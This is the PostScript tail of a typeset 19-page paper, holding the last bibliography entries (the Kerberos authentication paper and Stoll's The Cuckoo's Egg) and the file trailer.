4792(F)S
10 I
4877(T)S
8 I
4933(HE)S
2340 V
10 I
970(W)S
8 I
1053(INTER)S
10 I
1306(U)S
8 I
1378(SENIX)S
10 I
1626(C)S
8 I
1693(ONFERENCE)S
10 R
2158(,)S
2213(Usenix)S
2526(Association,)S
3053(San)S
3233(Diego,)S
3532(CA,)S
3726(February)S
4116(1989.)S
2496 V
720(28.)S
970(Steiner,)S
1311(Jennifer,)S
1690(Cli)S
1813 H
	(f)show 10 -.5 mul h (f)show
10 R
1874(ord)S
2040(Neuman,)S
2436(and)S
2613(Je)S
2696 H
	(f)show 10 -.5 mul h (f)show
10 R
2757(rey)S
2917(Schiller,)S
3286(``Kerberos:)S
3808(An)S
3963(Authentication)S
4591(Service)S
4924(for)S
2616 V
970(Open)S
1222(Network)S
1607(Systems,'')S
10 I
2067(U)S
8 I
2139(SENIX)S
10 I
2392(A)S
8 I
2453(SSOCIATION)S
10 I
2938(W)S
8 I
3021(INTER)S
10 I
3279(C)S
8 I
3346(ONFERENCE)S
10 I
3846(1988)S
4081(P)S
8 I
4142(ROCEEDINGS)S
10 R
4637(,)S
4697(pp.)S
4857(191-)S
2736 V
970(202,)S
1175(February)S
1565(1988.)S
2892 V
720(29.)S
970(Stoll,)S
1223(Cli)S
1346 H
	(f)show 10 -.5 mul h (f)show
10 R
1407(,)S
10 I
1470(The)S
1658(Cuckoo's)S
2073(Egg,)S
10 R
2297(Doubleday,)S
2798(NY,)S
3005(NY,)S
3212(October)S
3571(1989.)S
3865(Also)S
4093(published)S
4521(in)S
4638(Frankfurt,)S
3012 V
970(Germany)S
1371(by)S
1501(Fischer-Verlag.)S
7920 V
EP
%%Trailer
%%DocumentFonts: Courier Times-Roman Times-Bold Times-Italic Symbol Troff
%%Pages: 19